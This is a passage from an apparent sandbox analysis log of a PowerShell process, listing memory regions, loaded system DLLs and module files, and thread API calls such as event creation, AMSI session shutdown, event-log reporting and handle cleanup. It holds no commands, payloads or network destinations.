private name = "private_0x000000001bc60000" filename = "" Region: id = 4341 start_va = 0x1bc70000 end_va = 0x1bc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bc70000" filename = "" Region: id = 4364 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4380 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 4399 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4400 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 4401 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 4421 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4422 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 4423 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 4460 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4461 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 4690 start_va = 0x7ffb03480000 end_va = 0x7ffb03d89fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\9be0116d0c465b75b11a42413573047c\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.data\\9be0116d0c465b75b11a42413573047c\\system.data.ni.dll") Region: id = 4763 start_va = 0x7ffb03130000 end_va = 0x7ffb0347cfff monitored = 1 entry_point = 0x7ffb0327158e region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 4778 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4779 start_va = 0x1bc40000 end_va = 0x1bf83fff monitored = 1 entry_point = 0x1bd8158e region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 4791 start_va = 0x7ffaa9f70000 end_va = 0x7ffaa9f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f70000" filename = "" Region: id = 4810 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4832 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 4833 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 4834 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 4835 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 4855 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4856 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 4874 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 4875 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 4876 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 4877 start_va = 0x1bb70000 end_va = 0x1bb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb70000" filename = "" Region: id = 4897 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4898 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 4899 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 4900 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 4901 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 4914 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4919 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 4920 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 4921 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 4922 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4943 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 4944 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 4945 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 4946 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 4947 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 4948 start_va = 0x1bb70000 end_va = 0x1bb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb70000" filename = "" Region: id = 4970 start_va = 0x1bb80000 end_va = 0x1bb8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb80000" filename = "" Region: id = 4971 start_va = 0x1bb90000 end_va = 0x1bb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb90000" filename = "" Region: id = 5027 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5045 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5046 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5048 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5049 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 5069 start_va = 0x1b890000 end_va = 0x1b890fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 5070 start_va = 0x1bb40000 end_va = 0x1bb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 5071 start_va = 0x1bb80000 end_va = 0x1bba7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 5286 start_va = 0x7ffb02440000 end_va = 0x7ffb03125fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\88a975931d03d5c3848280ed0b4cee0d\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p521220ea#\\88a975931d03d5c3848280ed0b4cee0d\\microsoft.powershell.commands.utility.ni.dll") Region: id = 5404 start_va = 0x1b890000 end_va = 0x1b895fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 5405 start_va = 0x1bb80000 end_va = 0x1bba7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 5456 start_va = 0x7ffaa9f80000 end_va = 0x7ffaa9f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f80000" filename = "" Region: id = 5476 start_va = 0x7ffaa9f90000 end_va = 0x7ffaa9f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f90000" filename = "" Region: id = 5478 start_va = 0x7ffaa9fa0000 end_va = 0x7ffaa9faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9fa0000" filename = "" Region: id = 5519 start_va = 0x1bb80000 end_va = 0x1bbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb80000" filename = "" Region: id = 5527 start_va = 0x1b890000 end_va = 0x1b895fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 5528 start_va = 0x1bb40000 end_va = 0x1bb67fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 5574 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5612 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5630 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 5631 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 5632 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 5633 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 5652 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5654 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5667 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 5668 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 5669 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 5716 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5717 start_va = 0x7ffaa9fb0000 end_va = 0x7ffaa9fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9fb0000" filename = "" Region: id = 5752 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5753 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 5754 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5776 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5780 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 5781 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 5782 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 5792 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5814 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5815 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 5816 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 5817 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 5840 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 5859 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5860 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 5875 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5876 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 5877 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5893 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 5912 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 5913 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 5914 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 6032 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 6035 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 6457 start_va = 0x1b890000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 6458 start_va = 0x1bc40000 end_va = 0x1bc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bc40000" filename = "" Region: id = 6463 start_va = 0x7ffb24fe0000 end_va = 0x7ffb25078fff monitored = 0 entry_point = 0x7ffb2500f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 6464 start_va = 0x1bc80000 end_va = 0x1bd5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 170 os_tid = 0xd98 [0197.345] AmsiCloseSession () returned 0x7ffb1cb78068 [0197.346] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x688 [0197.346] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6c0 [0197.346] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c4 [0197.346] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c8 [0197.346] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6e8 [0197.346] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x700 [0197.346] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6bc [0197.346] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6d4 [0197.346] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x69c [0197.347] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x704 [0197.347] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x698 [0197.347] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6d8 [0197.347] SetEvent (hEvent=0x6c8) returned 1 [0197.347] SetEvent (hEvent=0x688) returned 1 [0197.347] SetEvent (hEvent=0x6c0) returned 1 [0197.347] SetEvent (hEvent=0x6c4) returned 1 [0197.347] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x68c [0197.348] SetEvent (hEvent=0x574) returned 1 [0197.749] SetEvent (hEvent=0x6e8) returned 1 [0197.749] SetEvent (hEvent=0x700) returned 1 [0197.749] SetEvent (hEvent=0x6bc) returned 1 [0197.783] CoCreateGuid (in: pguid=0xccbf8 | out: pguid=0xccbf8*(Data1=0x64361cbb, Data2=0x6e25, Data3=0x411e, Data4=([0]=0x80, [1]=0xf3, [2]=0x31, [3]=0x6d, [4]=0x4b, [5]=0x20, [6]=0xae, [7]=0x35))) returned 0x0 [0197.787] ReportEventW (hEventLog=0x1a630008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x24e2f80*="Stopped", lpRawData=0x24e2de8) returned 1 [0197.883] AmsiCloseSession () returned 0x7ffb1cb78068 [0197.884] AmsiUninitialize () returned 0x1 [0197.898] SetEvent (hEvent=0x574) returned 1 [0198.098] CloseHandle (hObject=0x574) returned 1 [0198.100] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0198.104] CoGetContextToken (in: pToken=0xcf960 | out: pToken=0xcf960) returned 0x0 [0198.104] CObjectContext::QueryInterface () returned 0x0 [0198.104] CObjectContext::GetCurrentThreadType () returned 0x0 [0198.104] Release () returned 0x0 [0198.105] CoGetContextToken (in: pToken=0xcf470 | out: pToken=0xcf470) returned 0x0 [0198.105] CObjectContext::QueryInterface () returned 0x0 [0198.105] CObjectContext::GetCurrentThreadType () returned 0x0 [0198.105] Release () returned 0x0 [0198.109] CoGetContextToken (in: pToken=0xcf470 | out: pToken=0xcf470) returned 0x0 [0198.109] CObjectContext::QueryInterface () returned 0x0 [0198.109] CObjectContext::GetCurrentThreadType () returned 0x0 [0198.109] Release () returned 0x0 [0198.135] CoGetContextToken (in: pToken=0xcf470 | out: pToken=0xcf470) returned 0x0 [0198.135] CObjectContext::QueryInterface () returned 0x0 [0198.135] CObjectContext::GetCurrentThreadType () returned 0x0 [0198.135] Release () returned 0x0 [0198.170] CoGetContextToken (in: pToken=0xcf480 | out: pToken=0xcf480) returned 0x0 [0198.170] CObjectContext::QueryInterface () returned 0x0 [0198.170] CObjectContext::GetCurrentThreadType () returned 0x0 [0198.170] Release () returned 0x0 [0198.170] CoUninitialize () Thread: id = 175 os_tid = 0xfdc Thread: id = 176 os_tid = 0xcd0 Thread: id = 177 os_tid = 0xda0 [0177.805] CoGetContextToken (in: pToken=0x1a05fac0 | out: pToken=0x1a05fac0) returned 0x0 [0177.805] CoGetContextToken (in: pToken=0x1a05f9c0 | out: pToken=0x1a05f9c0) returned 0x0 [0177.805] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x1 [0177.805] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x0 [0177.806] RegCloseKey (hKey=0x564) returned 0x0 [0182.177] CloseHandle (hObject=0x690) returned 1 [0182.177] CloseHandle (hObject=0x6b4) returned 1 [0182.177] CloseHandle (hObject=0x69c) returned 1 [0182.177] CloseHandle (hObject=0x684) returned 1 [0182.178] CloseHandle (hObject=0x6a8) returned 1 [0182.178] CloseHandle (hObject=0x698) returned 1 [0182.178] CloseHandle (hObject=0x6b8) returned 1 [0182.178] CloseHandle (hObject=0x688) returned 1 [0182.178] CloseHandle (hObject=0x694) returned 1 [0182.179] CloseHandle (hObject=0x6a4) returned 1 [0182.179] CloseHandle (hObject=0x6ac) returned 1 [0182.179] CloseHandle (hObject=0x6a0) returned 1 [0187.270] CloseHandle (hObject=0x6dc) returned 1 [0187.270] CloseHandle (hObject=0x6d0) returned 1 [0187.271] CloseHandle (hObject=0x6e8) returned 1 [0187.271] CloseHandle (hObject=0x6d4) returned 1 [0187.271] CloseHandle (hObject=0x6a8) returned 1 [0187.271] CloseHandle (hObject=0x69c) returned 1 [0187.271] CloseHandle (hObject=0x6d8) returned 1 [0187.271] CloseHandle (hObject=0x698) returned 1 [0187.272] CloseHandle (hObject=0x688) returned 1 [0187.272] CloseHandle (hObject=0x6b8) returned 1 [0187.272] CertFreeCertificateContext (pCertContext=0x1a8ac430) returned 1 [0189.333] CloseHandle (hObject=0x6bc) returned 1 [0189.333] CloseHandle (hObject=0x68c) returned 1 [0189.333] CertFreeCertificateContext (pCertContext=0x1a8ab6b0) returned 1 [0189.333] CloseHandle (hObject=0x6c8) returned 1 [0189.334] CloseHandle (hObject=0x6c4) returned 1 [0189.334] CertFreeCertificateContext (pCertContext=0x1a8ab3b0) returned 1 [0189.335] CloseHandle (hObject=0x6c0) returned 1 [0191.893] CertFreeCertificateContext (pCertContext=0x1a8ab5b0) returned 1 [0191.893] CloseHandle (hObject=0x688) returned 1 [0198.106] EtwEventUnregister () returned 0x0 [0198.106] EtwEventUnregister () returned 0x0 [0198.107] EtwEventUnregister () returned 0x0 [0198.107] EtwEventUnregister () returned 0x0 [0198.107] EtwEventUnregister () returned 0x0 [0198.118] LocalFree (hMem=0x1a9e2820) returned 0x0 [0198.118] LocalFree (hMem=0x1a9e2930) returned 0x0 [0198.132] EtwEventUnregister () returned 0x0 [0198.138] CloseHandle (hObject=0x2f0) returned 1 [0198.144] EtwEventUnregister () returned 0x0 [0198.150] CloseHandle (hObject=0x578) returned 1 [0198.150] CloseHandle (hObject=0x57c) returned 1 [0198.150] CloseHandle (hObject=0x594) returned 1 [0198.151] CloseHandle (hObject=0x568) returned 1 [0198.151] CloseHandle (hObject=0x570) returned 1 [0198.151] CloseHandle (hObject=0x58c) returned 1 [0198.151] CloseHandle (hObject=0x590) returned 1 [0198.152] CloseHandle (hObject=0x56c) returned 1 [0198.152] CloseHandle (hObject=0x560) returned 1 [0198.152] CloseHandle (hObject=0x55c) returned 1 [0198.153] CloseHandle (hObject=0x37c) returned 1 [0198.153] CloseHandle (hObject=0x688) returned 1 [0198.153] CloseHandle (hObject=0x68c) returned 1 [0198.153] CloseHandle (hObject=0x6d8) returned 1 [0198.155] UnmapViewOfFile (lpBaseAddress=0x1a7b0000) returned 1 [0198.156] CloseHandle (hObject=0x3a8) returned 1 [0198.157] CloseHandle (hObject=0x6f8) returned 1 [0198.157] CloseHandle (hObject=0x6b4) returned 1 [0198.157] CloseHandle (hObject=0x6f4) returned 1 [0198.158] CloseHandle (hObject=0x6f0) returned 1 [0198.158] CloseHandle (hObject=0x6ec) returned 1 [0198.158] CloseHandle (hObject=0x698) returned 1 [0198.161] DeregisterEventSource (hEventLog=0x1a630008) returned 1 [0198.163] CloseHandle (hObject=0x704) returned 1 [0198.163] CloseHandle (hObject=0x274) returned 1 [0198.164] CloseHandle (hObject=0x69c) returned 1 [0198.164] CloseHandle (hObject=0x6d4) returned 1 [0198.164] CloseHandle (hObject=0x6bc) returned 1 [0198.164] CloseHandle (hObject=0x700) returned 1 [0198.165] CloseHandle (hObject=0x6e8) returned 1 [0198.165] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0198.165] CloseHandle (hObject=0x26c) returned 1 [0198.166] CloseHandle (hObject=0x6c8) returned 1 [0198.166] CloseHandle (hObject=0x6c4) returned 1 [0198.166] CloseHandle (hObject=0x584) returned 1 [0198.167] CloseHandle (hObject=0x6c0) returned 1 [0198.167] CloseHandle (hObject=0x598) returned 1 [0198.169] CoGetContextToken (in: pToken=0x1a05f470 | out: pToken=0x1a05f470) returned 0x0 [0198.169] CoGetContextToken (in: pToken=0x1a05f370 | out: pToken=0x1a05f370) returned 0x0 [0198.169] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x2 [0198.169] Release () returned 0x1 Thread: id = 203 os_tid = 0x820 [0198.156] CoGetContextToken (in: pToken=0x1a4af860 | out: pToken=0x1a4af860) returned 0x0 [0198.156] CObjectContext::QueryInterface () returned 0x0 [0198.156] CObjectContext::GetCurrentThreadType () returned 0x0 [0198.156] Release () returned 0x0 Thread: id = 204 os_tid = 0xcb8 Thread: id = 206 os_tid = 0x8ac Thread: id = 207 os_tid = 0x8a4 Thread: id = 208 os_tid = 0x14c [0173.911] SetThreadUILanguage (LangId=0x0) returned 